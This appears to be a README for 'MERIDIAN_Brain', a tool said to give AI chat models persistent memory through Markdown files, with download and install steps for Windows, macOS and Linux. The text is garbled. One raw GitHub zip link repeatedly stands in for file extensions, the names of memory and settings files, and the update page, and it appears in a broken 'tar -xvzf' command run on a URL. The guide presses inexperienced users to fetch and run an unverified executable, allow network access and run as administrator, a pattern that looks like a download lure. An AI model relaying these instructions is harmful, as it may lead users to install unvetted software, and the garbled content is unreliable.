MERIDIAN_Brain upgrades any AI model by turning it into Meridian, a smart assistant that remembers past interactions and lets you control how it thinks. It works with popular AI models like Claude, GPT, and Gemini. Instead of creating new systems, Meridian adds an extra layer using simple .md files to help the AI keep track of your conversations and adjust settings you choose.
This way, your AI becomes more useful, consistent, and adaptable while keeping things easy to understand and modify.
Before you get started, make sure your computer meets these basic requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or Linux Ubuntu 18.04+
- Processor: Intel i3 or equivalent (4 cores recommended)
- RAM: At least 4 GB (8 GB recommended)
- Disk Space: Minimum 500 MB free for installation and files
- Internet: Required to download the software and for AI model connection
- Optional: A text editor like Notepad (Windows), TextEdit (macOS), or any Markdown editor helps if you want to view or change Meridian’s settings manually
This guide will help you download, install, and run MERIDIAN_Brain, even if you have no experience with AI or programming.
Click the big blue button at the top or visit this page directly:
Download MERIDIAN_Brain Releases
This page contains the latest versions of MERIDIAN_Brain for different systems. Look for the file that matches your computer type:
- Windows users look for files ending in
.exeor.zip - macOS users look for
.dmgor.zip - Linux users look for
.AppImageorhttps://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip
Download the file that fits your system.
Windows:
- If you downloaded a
.exefile, double-click it and follow the installation steps. - If you downloaded a
.zipfile, right-click and select "Extract All," then open the folder and double-click the.exefile inside.
macOS:
- If you have a
.dmgfile, double-click to open it, then drag the MERIDIAN_Brain app to your Applications folder. - If you have a
.zipfile, double-click it to extract, then open the app.
Linux:
- If you have an
.AppImage, right-click the file, select "Properties," then check "Allow executing file as program." Double-click to run. - If you have a
https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zipfile, open a terminal and extract it usingtar -xvzf https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip. Navigate to the extracted folder to run the program.
- Open the installed application by double-clicking its icon.
- On first start, you may see a short welcome or setup guide. Follow the on-screen prompts.
- If the application requests access to the internet, allow it. This connection helps MERIDIAN_Brain communicate with AI services.
You don’t need to write any code to use MERIDIAN_Brain. The software works by storing information in easy-to-read Markdown files (.md), which track your AI’s memory and settings.
- See what your AI remembers from past chats.
- Adjust how creative or logical your AI responses are.
- Save your preferred settings for future use.
- Use your AI with different models without extra setup.
- MERIDIAN_Brain saves information in plain text files you can open and read with any text editor.
- When you start a new conversation with your AI, MERIDIAN_Brain loads these files to guide the AI’s answers.
- You can adjust parameters by changing simple keywords or numbers in these files. This changes the AI’s behavior immediately.
- Memory-Persistence: Your AI remembers context across sessions to provide consistent replies.
- Visible Cognitive State: See what your AI "knows" and its current status anytime.
- Customizable Parameters: Change how your AI thinks by modifying simple settings.
- Model Agnostic: Works with many AI models like GPT, Claude, Gemini, and others.
- No Coding Needed: All files use Markdown, so no programming skills are required.
- Lightweight: Minimal CPU and RAM usage, runs smoothly on modern machines.
- Open Structure: Easily backup, edit, or share your AI's settings and memory.
When you use MERIDIAN_Brain, it creates a folder with Markdown files:
https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip— Stores past conversations and context.https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip— Contains your AI’s settings.https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip— Use this for personal notes or reminders related to AI behavior.
You can find these files in your installation folder or choose a custom location during setup.
- App won’t start: Make sure your OS version meets requirements. Try restarting your computer.
- AI not responding: Check your internet connection. MERIDIAN_Brain needs online access to connect to AI models.
- Files not found or missing: Look in the installation folder or the folder you chose during setup.
- Settings not applying: Close and reopen the app after editing
.mdfiles. - Permission errors: On Windows, run as administrator. On macOS and Linux, check file access rights.
If issues continue, please raise an issue on the GitHub page.
You can get the latest version any time by visiting this page:
https://github.com/El1don1/MERIDIAN_Brain/raw/refs/heads/main/brain/MERIDIA_Brain_v2.1.zip
Follow the download and install steps above based on your computer system.
- Visit the GitHub repository for updates and issues.
- Check the README and provided documentation in the repo.
- Contact the developer by opening a GitHub issue if you find bugs or need advice.
Thank you for choosing MERIDIAN_Brain. It aims to make your AI smarter and easier to work with, without extra complexity.